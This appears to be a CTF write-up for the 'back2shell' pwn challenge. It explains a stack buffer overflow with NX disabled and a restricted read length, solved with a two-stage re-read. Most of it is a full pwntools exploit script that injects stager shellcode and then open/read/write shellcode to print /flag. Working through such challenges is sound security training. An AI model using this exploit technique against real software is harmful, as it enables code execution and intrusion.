In this challenge, we are given a stack address and there is a buffer overflow vulnerability present. The system does not have NX (No Execute) protection enabled, allowing us to execute shellcode directly on the stack.

However, the challenge has a restriction: we can only read a limited number of bytes directly. Thus, we cannot use the classic method of directly placing our shellcode into the buffer, as the length isn't sufficient. The solution involves leveraging a re-read technique to increase the number of bytes we can read in two stages, then use write-orw to execute the shellcode.

from pwn import *
from LibcSearcher import *
from ctypes import *
io = process('./back2shell')
elf = ELF('./back2shell')
context(log_level='debug',arch=elf.arch,os=elf.os)
#io=remote('hackaday2024-3-pwn-challenge-f6426840d82f82d3.elb.us-west-2.amazonaws.com',9999)
libc = elf.libc
def debug():
	gdb.attach(io,gdbscript="")
	pause()
def get_addr():
	return u64(io.recvuntil(b'\\x7f')[-6:].ljust(8,b'\\x00'))
def get_sys():
	return libcbase + next(libc.search(b'/bin/sh\\x00')), libcbase + libc.sym['system']
r 		= lambda num			: io.recv(num)
ru		= lambda data			: io.recvuntil(data)
rl		= lambda			: io.recvline()
s 		= lambda data 			: io.send(data)
sl 		= lambda data 			: io.sendline(data)
sla		= lambda data,pay		: io.sendlineafter(data,pay)
uu64 		= lambda size			: u64(io.recv(size).ljust(8,b'\\x00'))
uu32		= lambda size			: u32(io.recv(size).ljust(4,b'\\x00'))
itr 		= lambda 			: io.interactive()
li		= lambda x 			: print('\\x1b[01;38;5;214m' + x + '\\x1b[0m')

ru("Helloworld!!! Welcome to my challenge!\\n")
stack = int(r(14),16) + 0x40
li(hex(stack))
shellcode = asm(f'''
xor esi,esi
mov rdx,0x100
xor eax,eax
mov rsi,{stack}
syscall
''')
#debug()
pay = b'a'*(0x10+2) + p64(stack) + shellcode
s(pay)
sleep(0.1)
#pause()
pay = b'\\x90'*0x20 + asm(shellcraft.open("/flag")+
	shellcraft.read(3,stack+0x200,0x50)+
	shellcraft.write(1,stack+0x200,0x50))

s(pay)
#sl("cat /f*")
itr()